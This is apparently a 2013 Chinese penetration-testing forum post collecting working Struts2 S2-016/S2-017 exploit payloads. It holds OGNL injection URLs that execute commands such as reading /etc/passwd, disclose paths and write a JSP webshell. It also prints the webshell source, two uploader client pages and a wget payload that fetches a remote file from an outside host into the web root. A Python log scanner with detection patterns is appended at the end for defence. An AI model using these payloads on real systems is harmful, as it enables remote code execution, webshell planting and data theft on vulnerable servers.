中国网络渗透测试联盟
Title: Struts2 S2-016/S2-017 vulnerability code execution
Author: admin
Time: 2013-7-18 23:03
Everyone has already posted this, so I just tidied it up. Friendly reminder: your own neck is worth more than a shell.

If you like it, click thanks ^_^
Command execution with echoed output:

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Path disclosure:

http://www.example.com/struts2-b ... 8%29.close%28%29%7D
Writing a file:

http://www.example.com/struts2-blank/example/X.action?redirect:
${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
Content of the written file:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
It is really just a small JSP shell that needs a client page to drive it.

The parameter f is the file name and t is the content.
Client:

<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>
<input type=submit value="提交">
</center>
</form>
This creates fjp.jsp in the current directory.

shell:
http://www.example.com/struts2-blank/example/fjp.jsp
There is also a client page from @园长:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
</head>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
function upload(){
    var url = document.getElementById('url').value,
        content = document.getElementById('content').value,
        fileName = document.getElementById('fn').value,
        form = document.getElementById('fm');
    if(url.length == 0){
        alert("Url not allowed empty!");
        return;
    }
    if(content.length == 0){
        alert("Content not allowed empty!");
        return;
    }
    if(fileName.length == 0){
        alert("FileName not allowed empty!");
        return;
    }
    form.action = url;
    form.submit();
}
</script>
<body>
<div class="main">
<form id="fm" method="post">
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
<a href="javascript:upload();">Upload</a>
<textarea id="content" class="content" name="t" ></textarea>
</form>
</div>
</body>
</html>
There is also a wget getshell posted by @X:

?redirect
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
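Every payload in this post has the same request shape: a `redirect:` (or `redirectAction:`) parameter-name prefix carrying an OGNL `${...}` expression that reaches `java.lang.ProcessBuilder`, `java.io.FileWriter` or `#context.get(...)`. The following log check is an added example for this page, not code from the original post; the sample access-log lines, client addresses and action paths are constructed.

```python
import re
from urllib.parse import unquote

# S2-016 signature: a redirect:/redirectAction: parameter-name prefix followed by an OGNL ${...} or %{...}.
PREFIX_RE = re.compile(r'(?:^|[?&])(?:redirect|redirectAction):', re.IGNORECASE)
OGNL_RE = re.compile(r'[$%]\{')
# Classes and objects that appear in the payloads above; any of them inside a URL is a red flag.
DANGEROUS = ("java.lang.ProcessBuilder", "java.lang.Runtime",
             "java.io.FileWriter", "java.io.FileOutputStream", "#context.get(")
# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_target(target):
    """URL-decode up to twice, since payloads are often double-encoded to evade filters."""
    for _ in range(2):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(target):
    """Return the indicators found in one request target; an empty list means clean."""
    decoded = decode_target(target)
    reasons = []
    if PREFIX_RE.search(decoded):
        reasons.append("struts-redirect-prefix")
        if OGNL_RE.search(decoded):
            reasons.append("ognl-expression")
    hits = [d for d in DANGEROUS if d in decoded]
    if hits:
        reasons.append("dangerous-classes:" + ",".join(hits))
    return reasons

def scan(lines):
    """Return (client_ip, status, reasons) for every suspicious request in the log."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := classify(m.group("target"))):
            alerts.append((m.group("ip"), m.group("status"), reasons))
    return alerts

# Constructed sample log lines (not real traffic): a benign request, a single-encoded
# S2-016 request using the ProcessBuilder payload shape above, and a double-encoded one.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2013:23:03:00 +0800] "GET /struts2-blank/example/HelloWorld.action?name=alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [18/Jul/2013:23:03:01 +0800] "GET /struts2-blank/example/X.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27id%27})).start()} HTTP/1.1" 302 0',
    '203.0.113.9 - - [18/Jul/2013:23:03:02 +0800] "GET /struts2-blank/example/X.action?redirect%3A%24%7B%2523req%253d%2523context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27)%7D HTTP/1.1" 302 0',
]
```

Run `scan(SAMPLE_LOG)` to get the two flagged requests; a WAF rule or SIEM search built on the same three indicators covers the redirect-prefix variant of S2-016 regardless of which Java class the expression ends up calling.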
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)